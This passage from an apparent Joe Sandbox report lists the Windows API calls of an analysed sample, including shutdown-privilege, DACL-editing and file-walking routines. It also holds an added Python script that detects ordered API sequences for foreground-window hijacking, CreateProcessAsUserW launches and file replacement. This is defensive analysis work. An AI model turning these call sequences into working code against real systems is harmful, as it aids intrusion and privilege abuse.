                                                                                                                    • Instruction Fuzzy Hash: 32719772204300ABC310EF55CC85FAFB7E9AF88705F504D2FF645962D1E6B9E944875A
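The three listings above describe ordered API sequences rather than single suspicious calls: AttachThreadInput(..., 1), a keybd_event with virtual-key 0x12 (VK_MENU, the ALT key, whose synthetic press lifts the foreground lock), SetForegroundWindow and a final AttachThreadInput(..., 0) to detach, targeting the Shell_TrayWnd window; DuplicateTokenEx followed by OpenWindowStationW("winsta0"), SetProcessWindowStation, OpenDesktopW("default") and CreateProcessAsUserW; and a FindFirstFileW loop over "\*.*" that CopyFileW/DeleteFileW/MoveFileW its way through a directory before FindNextFileW. An analyst who sees such sequences by eye usually wants them flagged automatically on the next report. The Python below is an added example written for this page, not Joe Sandbox code and not code from the analysed sample: it parses lines in the report's "APIs" line format, splits them per function at each "APIs" heading, and matches ordered API subsequences with optional constraints on the printed argument literals. The signature names, the step choices in SIGNATURES and the ApiCall tuple are this example's own; the sample listing is a constructed subset of call lines copied from the three functions above.

```python
"""Ordered-API signature matcher for Joe Sandbox 'APIs' listings (added example)."""
import re
from collections import namedtuple

# One call line: [Part of subcall function <addr>:] <api>.<MODULE>[(<args>)][,] ref: <addr>
API_LINE = re.compile(
    r"(?P<sub>Part of subcall function [0-9A-F]{8}:\s*)?"
    r"(?P<api>[\w:@]+)\.(?P<mod>[A-Z][A-Z0-9]*)"
    r"(?:\((?P<args>[^)]*)\))?,?\s+ref:\s+(?P<ref>[0-9A-F]{8})"
)
# args: argument literals as printed; ref: call-site address; from_subcall: 'Part of subcall' line
ApiCall = namedtuple("ApiCall", "api module args ref from_subcall")

def parse_report(text):
    """Split report text into per-function call lists, one per 'APIs' heading."""
    blocks, current = [], []
    for line in text.splitlines():
        if line.strip() == "APIs":
            if current:
                blocks.append(current)
            current = []
            continue
        m = API_LINE.search(line)
        if not m:  # Strings, Memory Dump Source, Similarity, ... carry no call
            continue
        raw = m.group("args")
        args = tuple(a.strip() for a in raw.split(",")) if raw else ()
        current.append(ApiCall(m.group("api"), m.group("mod"), args,
                               m.group("ref"), m.group("sub") is not None))
    if current:
        blocks.append(current)
    return blocks

def match_signature(calls, steps):
    """steps: [(api, {arg_index: literal}), ...] matched as an ordered, not necessarily
    adjacent, subsequence of calls. Returns the matched addresses or None."""
    pos, hits = 0, []
    for api, want in steps:
        for i in range(pos, len(calls)):
            c = calls[i]
            if c.api == api and all(k < len(c.args) and c.args[k] == v for k, v in want.items()):
                hits.append(c.ref)
                pos = i + 1
                break
        else:
            return None
    return hits

VK_MENU = "00000012"  # ALT; a synthetic ALT press lifts the foreground lock

SIGNATURES = {  # names and step choices are this example's own
    # attach to the window owner's input queue, press ALT, take the foreground, detach
    "foreground_hijack_attachthreadinput_alt": [
        ("AttachThreadInput", {2: "00000001"}), ("keybd_event", {0: VK_MENU}),
        ("SetForegroundWindow", {}), ("AttachThreadInput", {2: "00000000"}),
    ],
    # duplicated token, interactive window station and desktop, CreateProcessAsUserW
    "create_process_as_user_on_winsta0": [
        ("DuplicateTokenEx", {}), ("OpenWindowStationW", {0: "winsta0"}),
        ("SetProcessWindowStation", {}), ("OpenDesktopW", {0: "default"}),
        ("CreateProcessAsUserW", {}),
    ],
    # directory walk that copies over and deletes files as it goes
    "find_copy_delete_file_replace": [
        ("FindFirstFileW", {}), ("CopyFileW", {}), ("DeleteFileW", {}), ("FindNextFileW", {}),
    ],
}

def scan(text, signatures=SIGNATURES):
    """Return [(block_index, signature_name, hit_addresses), ...]."""
    results = []
    for idx, calls in enumerate(parse_report(text)):
        for name, steps in signatures.items():
            hits = match_signature(calls, steps)
            if hits is not None:
                results.append((idx, name, hits))
    return results

# Constructed input: a subset of the call lines from the three listings above.
SAMPLE_LISTING = """\
APIs
• AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A2
• keybd_event.USER32(00000012,00000000), ref: 004344CF
• SetForegroundWindow.USER32(00000000), ref: 0043451E
• AttachThreadInput.USER32(00000000,?,00000000), ref: 0043453F
APIs
• DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 0044638E
• OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004463B8
• SetProcessWindowStation.USER32(00000000), ref: 004463DB
• OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004463F7
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
• CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,000F01FF,00000400), ref: 00446522
APIs
• FindFirstFileW.KERNEL32(?,?), ref: 0044BE02
• CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF0A
• DeleteFileW.KERNEL32(?), ref: 0044BF15
• FindNextFileW.KERNEL32(00000000,00000010), ref: 0044BF64
"""
```

Calling scan(SAMPLE_LISTING) yields one hit per function block, each with the call-site addresses that satisfied the steps, so a hit can be tied straight back to the listing. Matching is done per "APIs" block rather than across the whole report on purpose: the foreground sequence is only meaningful when all four steps sit in one function, and matching across functions would fire on almost any GUI program. Argument constraints can only use literals the sandbox resolved; a "?" in the listing means the value was not recovered and cannot be relied on, which is why the signatures above pin only the constants that are printed (the attach/detach flag, the ALT key code, the window-station and desktop names).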
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                                                                                    • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                                                                                    • __wsplitpath.LIBCMT ref: 00403492
                                                                                                                      • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                                                                    • _wcscpy.LIBCMT ref: 004034A7
                                                                                                                    • _wcscat.LIBCMT ref: 004034BC
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                                                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                      • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                                                                      • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                                                                      • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                                                      • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0040355C,?,?,?,00000010), ref: 00403B08
                                                                                                                      • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 00403B41
                                                                                                                    • _wcscpy.LIBCMT ref: 004035A0
                                                                                                                    • _wcslen.LIBCMT ref: 00403623
                                                                                                                    • _wcslen.LIBCMT ref: 0040367D
                                                                                                                    Strings
                                                                                                                    • Unterminated string, xrefs: 00428348
                                                                                                                    • #include depth exceeded. Make sure there are no recursive includes, xrefs: 00428200
                                                                                                                    • Error opening the file, xrefs: 00428231
                                                                                                                    • _, xrefs: 0040371C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpystd::exception::exception$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_memmove_wcscat
                                                                                                                    • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                                                                                                                    • API String ID: 3393021363-188983378
                                                                                                                    • Opcode ID: ce77724faf1e7fbc9fcf9b1a922f2907e035de924d79ec5656a8af7ae9668c55
                                                                                                                    • Instruction ID: 51a390cb75b153cc6cab8b26b712b327f6f81406d0e69f910df9a3585dc9283e
                                                                                                                    • Opcode Fuzzy Hash: ce77724faf1e7fbc9fcf9b1a922f2907e035de924d79ec5656a8af7ae9668c55
                                                                                                                    • Instruction Fuzzy Hash: CCD105B1508341AAD710EF64D841AEFBBE8AF85304F404C2FF98553291DB79DA49C7AB
APIs
• FindFirstFileW.KERNEL32(?,?), ref: 00431AAA
• GetFileAttributesW.KERNEL32(?), ref: 00431AE7
• SetFileAttributesW.KERNEL32(?,?), ref: 00431AFD
• FindNextFileW.KERNEL32(00000000,?), ref: 00431B0F
• FindClose.KERNEL32(00000000), ref: 00431B20
• FindClose.KERNEL32(00000000), ref: 00431B34
• FindFirstFileW.KERNEL32(*.*,?), ref: 00431B4F
• SetCurrentDirectoryW.KERNEL32(?), ref: 00431B96
• SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 00431BBA
• FindNextFileW.KERNEL32(00000000,00000010), ref: 00431BC2
• FindClose.KERNEL32(00000000), ref: 00431BCD
• FindClose.KERNEL32(00000000), ref: 00431BDB
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
• String ID: *.*
• API String ID: 1409584000-438819550
• Opcode ID: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
• Instruction ID: b696eadadcb8a1627fc7fa6feda0e6e57aab690e04623b9265854ab7309d24dd
• Opcode Fuzzy Hash: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
• Instruction Fuzzy Hash: CE41D8726002046BC700EF65DC45EAFB3ACAE89311F04592FF954C3190E7B8E519C7A9
APIs
• GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00431C09
• __swprintf.LIBCMT ref: 00431C2E
• _wcslen.LIBCMT ref: 00431C3A
• CreateDirectoryW.KERNEL32(?,00000000), ref: 00431C67
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID: CreateDirectoryFullNamePath__swprintf_wcslen
• String ID: :$\$\??\%s
• API String ID: 2192556992-3457252023
• Opcode ID: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
• Instruction ID: 5b8928ca783b893dacbf0721098a8616f59dd17613a34138e213b27d6ec4c177
• Opcode Fuzzy Hash: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
• Instruction Fuzzy Hash: EE413E726403186BD720DB54DC45FDFB3BCFF58710F00859AFA0896191EBB49A548BD8
APIs
• GetLocalTime.KERNEL32(?), ref: 004722A2
• __swprintf.LIBCMT ref: 004722B9
• SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,0048BF68), ref: 004724EC
• SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,0048BF68), ref: 00472506
• SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,0048BF68), ref: 00472520
• SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,0048BF68), ref: 0047253A
• SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,0048BF68), ref: 00472554
• SHGetFolderPathW.SHELL32(00000000,0000002E,00000000,00000000,0048BF68), ref: 0047256E
• SHGetFolderPathW.SHELL32(00000000,0000001F,00000000,00000000,0048BF68), ref: 00472588
• SHGetFolderPathW.SHELL32(00000000,00000017,00000000,00000000,0048BF68), ref: 004725A2
• SHGetFolderPathW.SHELL32(00000000,00000016,00000000,00000000,0048BF68), ref: 004725BC
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID: FolderPath$LocalTime__swprintf
• String ID: %.3d
• API String ID: 3337348382-986655627
• Opcode ID: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
• Instruction ID: 0d137f706e98bab13a4a4c7fcb7914b07bdb7c22a72ec07ab57cd4d47a51df83
• Opcode Fuzzy Hash: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
• Instruction Fuzzy Hash: A6C1EC326101185BD710FBA1DD8AFEE7328EB44701F5045BFF909A60C2DBB99B598F64
APIs
• FindFirstFileW.KERNEL32(?,?), ref: 004428A8
• FindNextFileW.KERNEL32(00000000,?), ref: 0044290B
• FindClose.KERNEL32(00000000), ref: 0044291C
• FindClose.KERNEL32(00000000), ref: 00442930
• FindFirstFileW.KERNEL32(*.*,?), ref: 0044294D
• SetCurrentDirectoryW.KERNEL32(?), ref: 0044299C
• SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 004429BF
• FindNextFileW.KERNEL32(00000000,00000010), ref: 004429C9
• FindClose.KERNEL32(00000000), ref: 004429D4
  • Part of subcall function 00433C08: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00433C2A
• FindClose.KERNEL32(00000000), ref: 004429E2
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
• String ID: *.*
• API String ID: 2640511053-438819550
• Opcode ID: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
• Instruction ID: 696d482812dd8bff2d9106dd2d2144e175b5fe2258968c3fd44c1969776f6f9a
• Opcode Fuzzy Hash: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
• Instruction Fuzzy Hash: AD410AB2A001186BDB10EBA5ED45FEF73689F89321F50465BFD0493280D6B8DE558BB8
APIs
• GetCurrentProcess.KERNEL32(00000028,?), ref: 004333CE
• OpenProcessToken.ADVAPI32(00000000), ref: 004333D5
• LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004333EA
• AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0043340E
• GetLastError.KERNEL32 ref: 00433414
• ExitWindowsEx.USER32(?,00000000), ref: 00433437
• InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 00433466
• SetSystemPowerState.KERNEL32(00000001,00000000), ref: 00433479
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
• String ID: SeShutdownPrivilege
• API String ID: 2938487562-3733053543
• Opcode ID: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
• Instruction ID: ad32a9094aef850e2966724807b7d50af50c82f056daff98c21d8f44207777ad
• Opcode Fuzzy Hash: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
• Instruction Fuzzy Hash: F221C971640205ABF7108FA4EC4EF7FB3ACE708702F144569FE09D51D1D6BA5D408765
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00436E45
                                                                                                                      • Part of subcall function 00436E2B: GetLastError.KERNEL32(?,00000000,?), ref: 00436E4F
                                                                                                                      • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00436E75
                                                                                                                      • Part of subcall function 00436DF7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00436E12
                                                                                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0044618A
                                                                                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004461BE
                                                                                                                    • GetLengthSid.ADVAPI32(?), ref: 004461D0
                                                                                                                    • GetAce.ADVAPI32(?,00000000,?), ref: 0044620D
                                                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00446229
                                                                                                                    • GetLengthSid.ADVAPI32(?), ref: 00446241
                                                                                                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0044626A
                                                                                                                    • CopySid.ADVAPI32(00000000), ref: 00446271
                                                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004462A3
                                                                                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004462C5
                                                                                                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004462D8
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1255039815-0
                                                                                                                    • Opcode ID: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                                                                                                    • Instruction ID: cbecfdc94e872455e881353a2ef69e95113e06a92746e25f2a634f38edc45108
                                                                                                                    • Opcode Fuzzy Hash: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                                                                                                    • Instruction Fuzzy Hash: C251BC71A00209BBEB10EFA1CD84EEFB778BF49704F01855EF515A7241D6B8DA05CB69
                                                                                                                    APIs
                                                                                                                    • __swprintf.LIBCMT ref: 00433073
                                                                                                                    • __swprintf.LIBCMT ref: 00433085
                                                                                                                    • __wcsicoll.LIBCMT ref: 00433092
                                                                                                                    • FindResourceW.KERNEL32(?,?,0000000E), ref: 004330A5
                                                                                                                    • LoadResource.KERNEL32(?,00000000), ref: 004330BD
                                                                                                                    • LockResource.KERNEL32(00000000), ref: 004330CA
                                                                                                                    • FindResourceW.KERNEL32(?,?,00000003), ref: 004330F7
                                                                                                                    • LoadResource.KERNEL32(?,00000000), ref: 00433105
                                                                                                                    • SizeofResource.KERNEL32(?,00000000), ref: 00433114
                                                                                                                    • LockResource.KERNEL32(?), ref: 00433120
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1158019794-0
                                                                                                                    • Opcode ID: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                                                                                                    • Instruction ID: 48d2d5a3af9b637b7fc6f2c6b5a7fdd3517197a5f8dc2ef3994740021b7ed835
                                                                                                                    • Opcode Fuzzy Hash: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                                                                                                    • Instruction Fuzzy Hash: C741F1322002146BDB10EF65EC84FAB37ADEB89321F00846BFD01C6245E779DA51C7A8
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1737998785-0
                                                                                                                    • Opcode ID: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                                                                                                    • Instruction ID: d84b136cee2c902db59abfe4f82a3f409d39725fe24efd6a62fd8a04edebb5dd
                                                                                                                    • Opcode Fuzzy Hash: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                                                                                                    • Instruction Fuzzy Hash: 334114726001119FC310EFA5EC89B5EB7A4FF54315F00856EF909EB3A1EB75A941CB88
                                                                                                                    APIs
                                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0045D627
                                                                                                                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D6B5
                                                                                                                    • GetLastError.KERNEL32 ref: 0045D6BF
                                                                                                                    • SetErrorMode.KERNEL32(00000000,?), ref: 0045D751
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                    • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                    • API String ID: 4194297153-14809454
                                                                                                                    • Opcode ID: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                                                                                    • Instruction ID: 1f300c266cb1daf6abeae651b696e439ee3a0372042695327ab67fb83666ce96
                                                                                                                    • Opcode Fuzzy Hash: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                                                                                    • Instruction Fuzzy Hash: FE418235D00209DFCB10EFA5C884A9DB7B4FF48315F10846BE905AB352D7799A85CB69
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
